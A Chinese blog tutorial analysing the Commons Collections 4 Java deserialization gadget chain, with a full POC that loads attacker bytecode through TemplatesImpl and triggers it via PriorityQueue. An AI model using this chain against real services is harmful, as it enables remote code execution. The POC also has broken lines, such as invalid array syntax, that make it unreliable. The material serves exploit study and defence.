java安全之CommonsCollections4详解

java安全之CommonsCollections4详解

目录

引子

PriorityQueue

readobject()方法

heapify()调用了siftdown()方法

TransformingComparator

问题

POC

结语

引子

CC4简单来说就是CC3前半部分和CC2后半部分拼接组成的,对于其利用的限制条件与CC2一致,一样需要在commons-collections-4.0版本使用,原因是TransformingComparator类在3.1-3.2.1版本中还没有实现Serializable接口,无法被反序列化。

接下来让我们仔细分析一下。

PriorityQueue

PriorityQueue是一个优先队列,作用是用来排序,重点在于每次排序都要触发传入的比较器comparator的compare()方法 在CC2中,此类用于调用PriorityQueue重写的readObject来作为触发入口

PriorityQueue中的readObject间接调用了compare() 而compare()最终调用了transform()

readobject()方法 private void readObject(java.io.ObjectInputStream s) throws java.io.IOException, ClassNotFoundException { // Read in size, and any hidden stuff s.defaultReadObject(); // Read in (and discard) array length s.readInt(); queue = new Object[size]; // Read in all elements. for (int i = 0; i < size; i++) queue[i] = s.readObject(); // Elements are guaranteed to be in "proper order", but the // spec has never explained what that might be. heapify(); }

重写了该方法并在最后调用了heapify()方法,我们跟进一下:

private void heapify() { for (int i = (size >>> 1) - 1; i >= 0; i--) siftDown(i, (E) queue[i]); }

这里的话需要长度等于2才能进入for循环,我们要怎样改变长度呢。

这里用到的是该类的add方法,将指定的元素插入此优先级队列。

heapify()调用了siftdown()方法

继续跟进:

private void siftDown(int k, E x) { if (comparator != null) siftDownUsingComparator(k, x); else siftDownComparable(k, x); }

可以看到判断条件

if (comparator != null)

调用了

siftDownUsingComparator(k, x);

在siftDownUsingComparator()又调用了 comparator.compare()。

TransformingComparator

可以看到该类在CC3的版本中不能反序列化,在CC4的版本中便可以了。

TransformingComparator是一个修饰器,和CC1中的ChainedTransformer类似。

TransformingComparator里面存在compare方法,当我们调用时就会调用传入transformer对象的transform方法具体实现是this.transformer在传入ChainedTransformer后,会调用ChainedTransformer#transform反射链。

问题

1.就像刚才heapify里面所说的

private void heapify() { for (int i = (size >>> 1) - 1; i >= 0; i--) siftDown(i, (E) queue[i]); }

我们要进入循环要修改值,通过add方法。

priorityQueue.add(1); priorityQueue.add(2);

2.initialCapacity的值要大于1

3.comparator != null

4.通过反射来修改值防止在反序列化前调用,就如之前的链一样,我们到利用时再用反射修改参数。

类似这个样子:

Class c=transformingComparator.getClass(); Field transformField=c.getDeclaredField("transformer"); transformField.setAccessible(true); transformField.set(transformingComparator,chainedTransformer);

我们先放置个反序列化前不会执行这条链的随便一个参数:

TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1)); POC package ysoserial; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; import javassist.convert.TransformWriteField; import org.apache.commons.collections4.Transformer; import org.apache.commons.collections4.comparators.TransformingComparator; import org.apache.commons.collections4.functors.ChainedTransformer; import org.apache.commons.collections4.functors.ConstantTransformer; import org.apache.commons.collections4.functors.InstantiateTransformer; import org.apache.commons.collections4.functors.InvokerTransformer; import org.apache.commons.collections4.map.LazyMap; import org.apache.xalan.xsltc.trax.TrAXFilter; import javax.xml.crypto.dsig.Transform; import javax.xml.transform.Templates; import java.io.*; import java.lang.reflect.*; import java.nio.file.Files; import java.nio.file.Paths; import java.util.HashMap; import java.util.Map; import java.util.PriorityQueue; public class cc4 { public static void main(String[] args) throws Exception { TemplatesImpl templates=new TemplatesImpl(); Class tc=templates.getClass(); Field nameField=tc.getDeclaredField("_name"); nameField.setAccessible(true); nameField.set(templates,"XINO"); Field bytecodesField=tc.getDeclaredField("_bytecodes"); bytecodesField.setAccessible(true); byte[] code = Files.readAllBytes(Paths.get("D://tmp/test.class")); byte[][] codes=[code]; bytecodesField.set(templates,codes); Field tfactoryField=tc.getDeclaredField("_tfactory"); tfactoryField.setAccessible(true); tfactoryField.set(templates,new TransformerFactoryImpl()); InstantiateTransformer instantiateTransformer=new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates}); // Transformer[] transformers=new Transformer[]{ new ConstantTransformer(TrAXFilter.class), instantiateTransformer }; ChainedTransformer chainedTransformer=new ChainedTransformer(transformers); TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1)); PriorityQueue priorityQueue=new PriorityQueue<>(transformingComparator); priorityQueue.add(1); priorityQueue.add(2); Class c=transformingComparator.getClass(); Field transformField=c.getDeclaredField("transformer"); transformField.setAccessible(true); transformField.set(transformingComparator,chainedTransformer); serialize(priorityQueue); unserialize("ser.bin"); } public static void serialize(Object obj) throws Exception{ ObjectOutputStream oss=new ObjectOutputStream(new FileOutputStream("ser.bin")); oss.writeObject(obj); } public static void unserialize(Object obj) throws Exception{ ObjectInputStream oss=new ObjectInputStream(new FileInputStream("ser.bin")); oss.readObject(); } } 结语

这次给大家带来的是CC4链的简单分析,可以看到CC4链还是没有脱离之前跟的链的影子,我们可以看到CC3的前半部分以及CC2的后半部分,需要注意的问题的话就是版本问题了吧还有上面提到的一些小细节,至此CC链就快跟完了。

以上就是java安全之CommonsCollections4详解的详细内容,更多关于java安全CommonsCollections4的资料请关注易知道(ezd.cc)其它相关文章!

推荐阅读